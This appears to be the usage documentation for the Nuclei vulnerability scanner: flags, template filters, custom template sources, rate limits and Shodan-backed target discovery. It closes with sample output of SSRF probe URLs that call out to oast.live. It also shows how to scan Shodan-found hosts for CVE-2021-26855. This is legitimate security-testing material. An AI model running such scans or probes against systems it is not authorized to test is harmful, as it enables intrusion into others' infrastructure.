| [Dynamic Variables](#) | Utilize dynamic variables in templates to perform parameterized scanning, enabling versatile and flexible scanning configurations. |
| [Inclusion and Exclusion Filters](#) | Apply inclusion and exclusion filters to specify targets, reducing scanning scope and focusing on specific areas of interest. |
| [Authentication Support](/tools/nuclei/authenticated-scans) | Nuclei supports various authentication mechanisms, including HTTP basic authentication, JWT token authentication, and more. |
| [Embedding custom code in templates](#) | Execute custom code within Nuclei templates to incorporate user-defined logic, perform advanced scanning actions, and more. |
## How can I use Nuclei?
The global security community, including numerous researchers and engineers, actively contributes to the Nuclei template ecosystem. With over 6500 templates contributed thus far, Nuclei is continuously updated with real-world exploits and cutting-edge attack vectors.
Nuclei templates support scanning for critical issues such as the Log4j vulnerability and RCEs that impact vendors such as GitLab, Cisco, F5, and many others. Nuclei has dozens of use cases, including:
| Use Case | Description |
| ------------------------------------------ | --------------------------------------------------------------------------------------------- |
| Web Application Security | Identifies common web vulnerabilities with community-powered templates. |
| Infrastructure Security | Audits server configurations, open ports, and insecure services for security issues. |
| API Security Testing `alpha` | Tests APIs against known vulnerabilities and misconfigurations. |
| (CI/CD) Security | Integrates into CI/CD pipelines to minimize vulnerability resurface into production. |
| Third-party Vendor Assessment | Evaluates the security of third-party vendors by scanning their digital assets. |
| Cloud Security `alpha` | Scans cloud environments for misconfigurations and vulnerabilities. |
| Mobile Application Security | Scans mobile applications for security issues, including API tests and configuration checks. |
| Network Device Security `alpha` | Identifies vulnerabilities in network devices like routers, switches, and firewalls. |
| Web Server Assessment | Identifies common vulnerabilities and misconfigurations in web servers. |
| Content Management System (CMS) Assessment | Identifies vulnerabilities specific to CMS platforms like WordPress, Joomla, or Drupal. |
| Database Security Assessment | Scans databases for known vulnerabilities, default configurations, and access control issues. |
## Who is Nuclei for?
People use Nuclei in a variety of ways:
* **Security Engineers/Analysts**: Conduct security assessments, proactively identify vulnerabilities, convert custom vectors and analyze latest attack vectors.
* **Red Teams**: Leverage Nuclei as part of their offensive security operations to simulate real-world attack scenarios, identify weaknesses, and provide actionable recommendations for enhancing overall security.
* **DevOps Teams**: Integrate Nuclei into their CI/CD pipelines to ensure continuous security and regression of custom vulnerabilities.
* **Bug Bounty Hunters**: Leverage Nuclei to find vulnerabilities across their programs listed on platforms like HackerOne, Bugcrowd, Intigriti etc.
* **Penetration Testers**: Utilize Nuclei to automate their assessment methodologies into templates for their clients' systems.
### Security Engineers
Nuclei offers a number of features that are helpful for security engineers to customise workflows in their organization. With the varieties of scan capabilities (like DNS, HTTP, TCP), security engineers can easily create a suite of custom checks with Nuclei.
* Protocols support including: TCP, DNS, HTTP, File, etc
* Achieve complex vulnerability steps with workflows and [dynamic requests.](https://blog.projectdiscovery.io/nuclei-unleashed-quickly-write-complex-exploits/)
* Easily integrate into CI/CD, designed to be easily integrated into regression cycle to actively check the fix and re-appearance of vulnerability.
### Developers and Organizations
Nuclei is built with simplicity in mind and templates backed by hundreds of community members, it allows you to stay updated with the latest security threats using continuous Nuclei scanning on the hosts.
It is designed to be easily integrated into regression tests cycle, to verify fixes and eliminate future vulnerabilities.
* **CI/CD:** Engineers are already using Nuclei within their CI/CD pipeline, it allows them to constantly monitor their staging and production environments with customised templates.
* **Continuous Regression Cycle:** With Nuclei, you can create your custom template on every new identified vulnerability and put into Nuclei engine to eliminate in the continuous regression cycle.
### Bug Bounty Hunters
Nuclei allows a custom testing approach, supporting your own suite of checks to easily run across your bug bounty programs. In addition, Nuclei can be easily integrated into any continuous scanning workflow.
* Nuclei is easily integrated into other tool workflows
* Can process thousands of hosts in few minutes
* Easily automates your custom testing approach with our simple YAML DSL
Check our projects and tools to see what might fit into your bug bounty workflow: [github.com/projectdiscovery](http://github.com/projectdiscovery). We also host a daily [refresh of DNS data at Chaos](http://chaos.projectdiscovery.io).
### Penetration Testers
Nuclei can immensely improve how you approach security assessment by augmenting the manual, repetitive processes. Consultancies are already converting their manual assessment steps with Nuclei, it allows them to run set of their custom assessment approach across thousands of hosts in an automated manner.
Pen-testers get the full power public templates and customization capabilities to speed up their assessment process, particularly during the regression cycle where you can easily verify the fix.
* Easily create your compliance, standards suite (e.g. OWASP Top 10) checklist
* Use capabilities like [DAST](https://docs.projectdiscovery.io/templates/protocols/http/fuzzing-overview) and [workflows](https://docs.projectdiscovery.io/templates/workflows/overview) to simplify complex manual steps and repetitive assessment through automated with Nuclei.
* Easy to re-test vulnerability-fix by just re-running the template.
# Running Nuclei
Learn about how to run Nuclei and produce results
## How to Run Nuclei
Nuclei templates offer two primary execution methods:
### Supported Input Formats
Nuclei supports various input formats to run template against, including urls, hosts, ips, cidrs, asn, openapi, swagger, proxify, burpsuite exported data and more. To learn more on using input specify options, you can refer [nuclei input formats](/tools/nuclei/input-formats).
These inputs can be given to nuclei using `-l` and `-input-mode` flags.
```console
-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
```
Executing nuclei against a list of inputs (urls, hosts, ips, cidrs, asn) is as simple as running the following command:
```bash
nuclei -l targets.txt
```
For running other input formats (burp, jsonl, yaml, openapi, swagger), you can use the `-im` flag to specify the input mode.
```bash
nuclei -l targets.burp -im burp
```
```bash
nuclei -l openapi.yaml -im openapi
```
and so on.
### Executing Nuclei Templates
`-t/templates`
**Default Templates**
Most community templates from our [nuclei-template repository](https://github.com/projectdiscovery/nuclei-templates) are executed by default, directly from the standard installation path. The typical command is as follows:
```sh
nuclei -u https://example.com
```
However, there are some exceptions regarding the templates that run by default:
* Certain tags and templates listed in the [default `.nuclei-ignore` file](https://github.com/projectdiscovery/nuclei-templates/blob/main/.nuclei-ignore) are not included.
* [Code Templates](/templates/protocols/code) require the `-code` flag to execute.
* [Headless Templates](/templates/protocols/headless) will not run unless you pass the `-headless` flag.
* [Fuzzing Templates](/template/protocols/http/fuzzing-overview) will not run unless you pass the `-fuzz` flag.
* A separate collection of [Fuzzing Templates](/templates/protocols/http/fuzzing-overview), located in a [different repository](https://github.com/projectdiscovery/fuzzing-templates), must be downloaded and configured separately for use.
You can also run templates against a list of URLs:
```sh
nuclei -list http_urls.txt
```
**Custom Templates**
To run a custom template directory or multiple directories, use the following command structure:
```sh
nuclei -u https://example.com -t cves/ -t exposures/
```
Templates from custom GitHub repositories, stored under the github directory, can be executed with this command:
```sh
nuclei -u https://example.com -t github/private-repo
```
You can also directly run a template from any ProjectDiscovery Cloud Platform URL like this:
```sh
nuclei -u https://example.com -t https://cloud.projectdiscovery.io/public/tech-detect
```
### Executing Template Workflows
`-w/workflows`
[Workflows](/templates/workflows/overview) can be executed using the following command:
```sh
nuclei -u https://example.com -w workflows/
```
Similarly, Workflows can be executed against a list of URLs.
```sh
nuclei -list http_urls.txt -w workflows/wordpress-workflow.yaml
```
## Types of Templates
### Template **Filters**
Nuclei engine supports three basic filters to customize template execution.
1. Tags (`-tags`)
Filter based on tags field available in the template.
2. Severity (`-severity`)
Filter based on severity field available in the template.
3. Author (`-author`)
Filter based on author field available in the template.
As default, Filters are applied on installed path of templates and can be customized with manual template path input.
For example, below command will run all the templates installed at `~/nuclei-templates/` directory and has `cve` tags in it.
```sh
nuclei -u https://example.com -tags cve
```
And this example will run all the templates available under `~/nuclei-templates/exposures/` directory and has `config` tag in it.
```sh
nuclei -u https://example.com -tags config -t exposures/
```
Multiple filters works together with AND condition,
below example runs all templates with `cve` tags
AND has `critical` OR `high` severity AND `geeknik` as author of template.
```sh
nuclei -u https://example.com -tags cve -severity critical,high -author geeknik
```
### Advanced Filters
Multiple filters can also be combined using the template condition flag (`-tc`) that allows complex expressions like the following ones:
```sh
nuclei -tc "contains(id,'xss') || contains(tags,'xss')"
nuclei -tc "contains(tags,'cve') && contains(tags,'ssrf')"
nuclei -tc "contains(name, 'Local File Inclusion')"
```
The supported fields are:
* `id` string
* `name` string
* `description` string
* `tags` slice of strings
* `authors` slice of strings
* `severity` string
* `protocol` string
* `http_method` slice of strings
* `body` string (containing all request bodies if any)
* `matcher_type` slice of string
* `extractor_type` slice of string
* `description` string
Also, every key-value pair from the template metadata section is accessible. All fields can be combined with logical operators (`||` and `&&`) and used with DSL helper functions.
Similarly, all filters are supported in workflows as well.
```sh
nuclei -w workflows/wordpress-workflow.yaml -severity critical,high -list http_urls.txt
```
**Workflows**
In Workflows, Nuclei filters are applied on templates or sub-templates running via workflows, not on the workflows itself.
### Public Templates
Nuclei has built-in support for automatic template download/update from [**nuclei templates**](https://github.com/projectdiscovery/nuclei-templates) project which provides [community-contributed](https://github.com/projectdiscovery/nuclei-templates#-community) list of ready-to-use templates that is constantly updated.
Nuclei checks for new community template releases upon each execution and automatically downloads the latest version when available. optionally, this feature can be disabled using the `-duc` cli flag or the configuration file.
### Custom Templates
Users can create custom templates on a personal public / private GitHub / AWS Bucket that they wish to run / update while using nuclei from any environment without manually downloading the GitHub repository everywhere.
To use this feature, users need to set the following environment variables:
```bash
export GITHUB_TOKEN=gh_XXX
export GITHUB_TEMPLATE_REPO=my_nuclei_template
```
```bash
export GITLAB_SERVER_URL=https://gitlab.com
# The GitLab token must have the read_api and read_repository scope
export GITLAB_TOKEN=XXXXXXXXXX
# Comma separated list of repository IDs (not names)
export GITLAB_REPOSITORY_IDS=12345,67890
```
```bash
export AWS_ACCESS_KEY=AKIAXXXXXXXX
export AWS_SECRET_KEY=XXXXXX
export AWS_REGION=us-xxx-1
export AWS_TEMPLATE_BUCKET=aws_bucket_name
```
```bash
export AZURE_TENANT_ID=00000000-0000-0000-0000-000000000000
export AZURE_CLIENT_ID=00000000-0000-0000-0000-000000000000
export AZURE_CLIENT_SECRET=00000000-0000-0000-0000-000000000000
export AZURE_SERVICE_URL=https://XXXXXXXXXX.blob.core.windows.net/
export AZURE_CONTAINER_NAME=templates
```
Environment variables can also be provided to disable download from default and custom template locations:
```bash
# Disable download from the default nuclei-templates project
export DISABLE_NUCLEI_TEMPLATES_PUBLIC_DOWNLOAD=true
# Disable download from public / private GitHub project(s)
export DISABLE_NUCLEI_TEMPLATES_GITHUB_DOWNLOAD=true
# Disable download from public / private GitLab project(s)
export DISABLE_NUCLEI_TEMPLATES_GITLAB_DOWNLOAD=true
# Disable download from public / private AWS Bucket(s)
export DISABLE_NUCLEI_TEMPLATES_AWS_DOWNLOAD=true
# Disable download from public / private Azure Blob Storage
export DISABLE_NUCLEI_TEMPLATES_AZURE_DOWNLOAD=true
```
Once the environment variables are set, following command to download the custom templates:
```bash
nuclei -update-templates
```
This command will clone the repository containing the custom templates to the default nuclei templates directory (`$HOME/nuclei-templates/github/`).
The directory structure of the custom templates looks as follows:
```bash
tree $HOME/nuclei-templates/
nuclei-templates/
└── github/$GH_REPO_NAME # Custom templates downloaded from public / private GitHub project
└── gitlab/$GL_REPO_NAME # Custom templates downloaded from public / private GitLab project
└── s3/$BUCKET_NAME # Custom templates downloaded from public / private AWS Bucket
└── azure/$CONTAINER_NAME # Custom templates downloaded from public / private Azure Blob Storage
```
Users can then use the custom templates with the `-t` flag as follows:
```
nuclei -t github/my_custom_template -u https://example.com
```
The nuclei engine can be updated to latest version by using the `-update` flag.
Writing your own unique templates will always keep you one step ahead of
others.
### Nuclei Flags
```
nuclei -h
```
This will display help for the tool. Here are all the switches it supports.
```console
Nuclei is a fast, template based vulnerability scanner focusing
on extensive configurability, massive extensibility and ease of use.
Usage:
nuclei [flags]
Flags:
TARGET:
-u, -target string[] target URLs/hosts to scan
-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)
-eh, -exclude-hosts string[] hosts to exclude to scan from the input list (ip, cidr, hostname)
-resume string resume scan using resume.cfg (clustering will be disabled)
-sa, -scan-all-ips scan all the IP's associated with dns record
-iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)
TARGET-FORMAT:
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
-ro, -required-only use only required fields in input format when generating requests
-sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file
TEMPLATES:
-nt, -new-templates run only new templates added in latest nuclei-templates release
-ntv, -new-templates-version string[] run new templates added in specific version
-as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping
-t, -templates string[] list of template or template directory to run (comma-separated, file)
-turl, -template-url string[] template url or list containing template urls to run (comma-separated, file)
-w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)
-wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file)
-validate validate the passed templates to nuclei
-nss, -no-strict-syntax disable strict syntax check on templates
-td, -template-display displays the templates content
-tl list all available templates
-sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable
-code enable loading code protocol-based templates
-dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature
FILTERING:
-a, -author string[] templates to run based on authors (comma-separated, file)
-tags string[] templates to run based on tags (comma-separated, file)
-etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)
-itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration
-id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard)
-eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)
-it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration
-et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file)
-em, -exclude-matchers string[] template matchers to exclude in result
-s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown
-es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown
-pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript
-ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript
-tc, -template-condition string[] templates to run based on expression condition
OUTPUT:
-o, -output string output file to write found issues/vulnerabilities
-sresp, -store-resp store all request/response passed through nuclei to output directory
-srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default "output")
-silent display findings only
-nc, -no-color disable output content coloring (ANSI escape codes)
-j, -jsonl write output in JSONL(ines) format
-irr, -include-rr -omit-raw include request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)
-or, -omit-raw omit request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)
-ot, -omit-template omit encoded template in the JSON, JSONL output
-nm, -no-meta disable printing result metadata in cli output
-ts, -timestamp enables printing timestamp in cli output
-rdb, -report-db string nuclei reporting database (always use this to persist report data)
-ms, -matcher-status display match failure status
-me, -markdown-export string directory to export results in markdown format
-se, -sarif-export string file to export results in SARIF format
-je, -json-export string file to export results in JSON format
-jle, -jsonl-export string file to export results in JSONL(ine) format
CONFIGURATIONS:
-config string path to the nuclei configuration file
-fr, -follow-redirects enable following redirects for http templates
-fhr, -follow-host-redirects follow redirects on the same host
-mr, -max-redirects int max number of redirects to follow for http templates (default 10)
-dr, -disable-redirects disable redirects for http templates
-rc, -report-config string nuclei reporting module configuration file
-H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)
-V, -var value custom vars in key=value format
-r, -resolvers string file containing resolver list for nuclei
-sr, -system-resolvers use system DNS resolving as error fallback
-dc, -disable-clustering disable clustering of requests
-passive enable passive HTTP response processing mode
-fh2, -force-http2 force http2 connection on requests
-ev, -env-vars enable environment variables to be used in template
-cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts
-ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts
-ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts
-sml, -show-match-line show match lines for file templates, works with extractors only
-ztls use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default
-sni string tls sni hostname to use (default: input domain name)
-dt, -dialer-timeout value timeout for network requests.
-dka, -dialer-keep-alive value keep-alive duration for network requests.
-lfa, -allow-local-file-access allows file (payload) access anywhere on the system
-lna, -restrict-local-network-access blocks connections to the local / private network
-i, -interface string network interface to use for network scan
-at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb)
-sip, -source-ip string source ip address to use for network scan
-rsr, -response-size-read int max response size to read in bytes (default 10485760)
-rss, -response-size-save int max response size to read in bytes (default 1048576)
-reset reset removes all nuclei configuration and data files (including nuclei-templates)
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
INTERACTSH:
-iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)
-itoken, -interactsh-token string authentication token for self-hosted interactsh server
-interactions-cache-size int number of requests to keep in the interactions cache (default 5000)
-interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)
-interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)
-interactions-cooldown-period int extra time for interaction polling before exiting (default 5)
-ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates
FUZZING:
-ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix)
-fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single)
-fuzz enable loading fuzzing templates
UNCOVER:
-uc, -uncover enable uncover engine
-uq, -uncover-query string[] uncover search query
-ue, -uncover-engine string[] uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow) (default shodan)
-uf, -uncover-field string uncover fields to return (ip,port,host) (default "ip:port")
-ul, -uncover-limit int uncover results to return (default 100)
-ur, -uncover-ratelimit int override ratelimit of engines with unknown ratelimit (default 60 req/min) (default 60)
RATE-LIMIT:
-rl, -rate-limit int maximum number of requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
-bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)
-c, -concurrency int maximum number of templates to be executed in parallel (default 25)
-hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)
-headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)
-jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120)
-pc, -payload-concurrency int max payload concurrency for each template (default 25)
OPTIMIZATIONS:
-timeout int time to wait in seconds before timeout (default 10)
-retries int number of times to retry a failed request (default 1)
-ldp, -leave-default-ports leave default HTTP/HTTPS ports (eg. host:80,host:443)
-mhe, -max-host-error int max errors for a host before skipping from scan (default 30)
-te, -track-error string[] adds given error to max-host-error watchlist (standard, file)
-nmhe, -no-mhe disable skipping host from scan based on errors
-project use a project folder to avoid sending same request multiple times
-project-path string set a specific project path
-spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic)
-stream stream mode - start elaborating without sorting the input
-ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default auto)
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-nh, -no-httpx disable httpx probing for non-url input
-no-stdin disable stdin processing
HEADLESS:
-headless enable templates that require headless browser support (root user on Linux will disable sandbox)
-page-timeout int seconds to wait for each page in headless mode (default 20)
-sb, -show-browser show the browser on the screen when running templates with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-sc, -system-chrome use local installed Chrome browser instead of nuclei installed
-lha, -list-headless-action list available headless actions
DEBUG:
-debug show all requests and responses
-dreq, -debug-req show all sent requests
-dresp, -debug-resp show all received responses
-p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)
-pi, -proxy-internal proxy all internal requests
-ldf, -list-dsl-function list all supported DSL function signatures
-tlog, -trace-log string file to write sent requests trace log
-elog, -error-log string file to write sent requests error log
-version show nuclei version
-hm, -hang-monitor enable nuclei hang monitoring
-v, -verbose show verbose output
-profile-mem string optional nuclei memory profile dump file
-vv display templates loaded for scan
-svd, -show-var-dump show variables dump for debugging
-ep, -enable-pprof enable pprof debugging server
-tv, -templates-version shows the version of the installed nuclei-templates
-hc, -health-check run diagnostic check up
UPDATE:
-up, -update update nuclei engine to the latest released version
-ut, -update-templates update nuclei-templates to latest released version
-ud, -update-template-dir string custom directory to install / update nuclei-templates
-duc, -disable-update-check disable automatic nuclei/templates update check
STATISTICS:
-stats display statistics about the running scan
-sj, -stats-json display statistics in JSONL(ines) format
-si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)
-mp, -metrics-port int port to expose nuclei metrics on (default 9092)
CLOUD:
-auth configure projectdiscovery cloud (pdcp) api key (default true)
-cup, -cloud-upload upload scan results to pdcp dashboard
-sid, -scan-id string upload scan results to given scan id
AUTHENTICATION:
-sf, -secret-file string[] path to config file containing secrets for nuclei authenticated scan
-ps, -prefetch-secrets prefetch secrets from the secrets file
```
From Nuclei v3.0.0 `-metrics` port has been removed and merged with `-stats`
when using `-stats` flag metrics will be by default available at `localhost:9092/metrics`
and metrics-port can be configured by `-metrics-port` flag
### Rate **Limits**
Nuclei have multiple rate limit controls for multiple factors, including a number of templates to execute in parallel, a number of hosts to be scanned in parallel for each template, and the global number of request / per second you wanted to make/limit using nuclei, here is an example of each flag with description.
| Flag | Description |
| ---------- | -------------------------------------------------------------------- |
| rate-limit | Control the total number of request to send per seconds |
| bulk-size | Control the number of hosts to process in parallel for each template |
| c | Control the number of templates to process in parallel |
Feel free to play with these flags to tune your nuclei scan speed and accuracy. For more details on tuning these flag, you can refer [mass-scanning-cli](/tools/nuclei/mass-scanning-cli)
`rate-limit` flag takes precedence over the other two flags, the number of
requests/seconds can't go beyond the value defined for `rate-limit` flag
regardless the value of `c` and `bulk-size` flag.
### Traffic **Tagging**
Many BugBounty platform/programs requires you to identify the HTTP traffic you make, this can be achieved by setting custom header using config file at `$HOME/.config/nuclei/config.yaml` or CLI flag `-H / header`
Setting custom header using config file
```yaml
# Headers to include with each request.
header:
- 'X-BugBounty-Hacker: h1/geekboy'
- 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) / nuclei'
```
Setting custom header using CLI flag
```yaml
nuclei -header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) / nuclei' -list urls.txt -tags cves
```
### Template **Exclusion**
Nuclei supports a variety of methods for excluding / blocking templates from execution. By default, **nuclei** excludes the tags/templates listed below from execution to avoid unexpected fuzz based scans and some that are not supposed to run for mass scan, and these can be easily overwritten with nuclei configuration file / flags.
Nuclei engine supports two ways to manually exclude templates from scan,
1. Exclude Templates (`-exclude-templates/exclude`)
**exclude-templates** flag is used to exclude single or multiple templates and directory, multiple `-exclude-templates` flag can be used to provide multiple values.
2. Exclude Tags (`-exclude-tags/etags`)
**exclude-tags** flag is used to exclude templates based in defined tags, single or multiple can be used to exclude templates.
Example of excluding single template
```
nuclei -list urls.txt -t cves/ -exclude-templates cves/2020/CVE-2020-XXXX.yaml
```
Example of multiple template exclusion
```
nuclei -list urls.txt -exclude-templates exposed-panels/ -exclude-templates technologies/
```
Example of excluding templates with single tag
```
nuclei -l urls.txt -t cves/ -etags xss
```
Example of excluding templates with multiple tags
```
nuclei -l urls.txt -t cves/ -etags sqli,rce
```
* [.nuclei-ignore](https://github.com/projectdiscovery/nuclei-templates/blob/main/.nuclei-ignore) list - default list of tags and templates excluded from nuclei scan as default.
**.nuclei-ignore** file is not supposed to be modified by
user, as it gets used by nuclei internally, to overwrite ignore list, utilize [nuclei
configuration](/tools/nuclei/running#nuclei-config) file.
To prioritize certain templates or tags over the [.nuclei-ignore](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore) file or denylist, you must use the `-include-templates` or `-include-tags` flags. This will ensure that the specified templates or tags take precedence over any `.nuclei-ignore` or denylist entries.
Example of running blocked templates
```bash
nuclei -l urls.txt -include-tags iot,misc,fuzz
```
Example of executing a specific template that is in the denylist
Say that you have custom templates globbed (`*`) in the denylist on the Nuclei configuration file.
```yaml
# ...
exclude-templates:
- 'custom/**/*.yaml'
```
But you just want to execute a specific template.
```bash
nuclei -l urls.txt -include-templates custom/specific-template.yaml
```
### List Template Path
`-tl` option in Nuclei is used to list the paths of templates, rather than executing them. This can help you inspect which templates would be used for scan given your current template filter.
```sh
# Command to list templates (-tl)
nuclei -tags cve -severity critical,high -author geeknik -tl
```
### Scan on internet database
Nuclei supports integration with [uncover module](https://github.com/projectdiscovery/uncover) that supports services like Shodan, Censys, Hunter, Zoomeye, many more to execute Nuclei on these databases.
Here are uncover options to use -
```console
nuclei -h uncover
UNCOVER:
-uc, -uncover enable uncover engine
-uq, -uncover-query string[] uncover search query
-ue, -uncover-engine string[] uncover search engine (shodan,shodan-idb,fofa,censys,quake,hunter,zoomeye,netlas,criminalip) (default shodan)
-uf, -uncover-field string uncover fields to return (ip,port,host) (default "ip:port")
-ul, -uncover-limit int uncover results to return (default 100)
-ucd, -uncover-delay int delay between uncover query requests in seconds (0 to disable) (default 1)
```
You need to set the API key of the engine you are using as an environment variable in your shell.
```
export SHODAN_API_KEY=xxx
export CENSYS_API_ID=xxx
export CENSYS_API_SECRET=xxx
export FOFA_EMAIL=xxx
export FOFA_KEY=xxx
export QUAKE_TOKEN=xxx
export HUNTER_API_KEY=xxx
export ZOOMEYE_API_KEY=xxx
```
Required API keys can be obtained by signing up on following platform [Shodan](https://account.shodan.io/register), [Censys](https://censys.io/register), [Fofa](https://fofa.info/toLogin), [Quake](https://quake.360.net/quake/#/index), [Hunter](https://user.skyeye.qianxin.com/user/register?next=https%3A//hunter.qianxin.com/api/uLogin\&fromLogin=1) and [ZoomEye](https://www.zoomeye.org/login) .
Example of template execution using a search query.
```
export SHODAN_API_KEY=xxx
nuclei -id 'CVE-2021-26855' -uq 'vuln:CVE-2021-26855' -ue shodan
```
It can also read queries from templates metadata and execute template against hosts returned by uncover for that query.
Example of template execution using template-defined search queries.
Template snippet of [CVE-2021-26855](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-26855.yaml)
```yaml
metadata:
shodan-query: 'vuln:CVE-2021-26855'
```
```console
nuclei -t cves/2021/CVE-2021-26855.yaml -uncover
nuclei -tags cve -uncover
```
We can update the nuclei configuration file to include these tags for all scans.
## Nuclei **Config**
> Since release of [v2.3.2](https://blog.projectdiscovery.io/nuclei-v2-3-0-release/) nuclei uses [goflags](https://github.com/projectdiscovery/goflags) for clean CLI experience and long/short formatted flags.
>
> [goflags](https://github.com/projectdiscovery/goflags) comes with auto-generated config file support that coverts all available CLI flags into config file, basically you can define all CLI flags into config file to avoid repetitive CLI flags that loads as default for every scan of nuclei.
>
> Default path of nuclei config file is `$HOME/.config/nuclei/config.yaml`, uncomment and configure the flags you wish to run as default.
Here is an example config file:
```yaml
# Headers to include with all HTTP request
header:
- 'X-BugBounty-Hacker: h1/geekboy'
# Directory based template execution
templates:
- cves/
- vulnerabilities/
- misconfiguration/
# Tags based template execution
tags: exposures,cve
# Template Filters
tags: exposures,cve
author: geeknik,pikpikcu,dhiyaneshdk
severity: critical,high,medium
# Template Allowlist
#
# Note: This will take precedence over the .nuclei-ignore file and denylist
# entries (exclude-tags or exclude-templates list).
include-tags: dos,fuzz # Tag based inclusion
include-templates: # Template based inclusion
- vulnerabilities/xxx
- misconfiguration/xxxx
# Template Denylist
exclude-tags: info # Tag based exclusion
exclude-templates: # Template based exclusion
- vulnerabilities/xxx
- misconfiguration/xxxx
# Rate Limit configuration
rate-limit: 500
bulk-size: 50
concurrency: 50
```
Once configured, **config file be used as default**, additionally custom config file can be also provided using `-config` flag.
**Running nuclei with custom config file**
```
nuclei -config project.yaml -list urls.txt
```
## Nuclei Result Dashboard
Nuclei now allows seamless integration with the ProjectDiscovery Cloud Platform to simplify the visualization of Nuclei results and generate swift reports. This highly requested feature from the community enables easier handling of scan results with minimal effort.
Follow the steps below to set up your PDCP Result Dashboard:
1. Visit [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) to create free PDCP API key.
2. Use the `nuclei -auth` command, enter your API key when prompted.
3. To perform a scan and upload the results straight to the cloud, use the `-cloud-upload` option while running a nuclei scan.
An example command might look like this:
```bash
nuclei -target http://honey.scanme.sh -cloud-upload
```
And the output would be like this:
```console
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.1.0
projectdiscovery.io
[INF] Current nuclei version: v3.1.0 (latest)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] To view results on cloud dashboard, visit https://cloud.projectdiscovery.io/scans upon scan completion.
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 71
[INF] Executing 71 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[CVE-2017-9506] [http] [medium] http://honey.scanme.sh/plugins/servlet/oauth/users/icon-uri?consumerUri=http://clk37fcdiuf176s376hgjzo3xsoq5bdad.oast.live
[CVE-2019-9978] [http] [medium] http://honey.scanme.sh/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://clk37fcdiuf176s376hgyk9ppdqe9a83z.oast.live
[CVE-2019-8451] [http] [medium] http://honey.scanme.sh/plugins/servlet/gadgets/makeRequest
[CVE-2015-8813] [http] [high] http://honey.scanme.sh/Umbraco/feedproxy.aspx?url=http://clk37fcdiuf176s376hgj885caqoc713k.oast.live
[CVE-2020-24148] [http] [critical] http://honey.scanme.sh/wp-admin/admin-ajax.php?action=moove_read_xml
[CVE-2020-5775] [http] [medium] http://honey.scanme.sh/external_content/retrieve/oembed?endpoint=http://clk37fcdiuf176s376hgyyxa48ih7jep5.oast.live&url=foo
[CVE-2020-7796] [http] [critical] http://honey.scanme.sh/zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://clk37fcdiuf176s376hgi9b8sd33se5sr.oast.live%23
[CVE-2017-18638] [http] [high] http://honey.scanme.sh/composer/send_email?to=hVsp@XOvw&url=http://clk37fcdiuf176s376hgyf8y81i9oju3e.oast.live
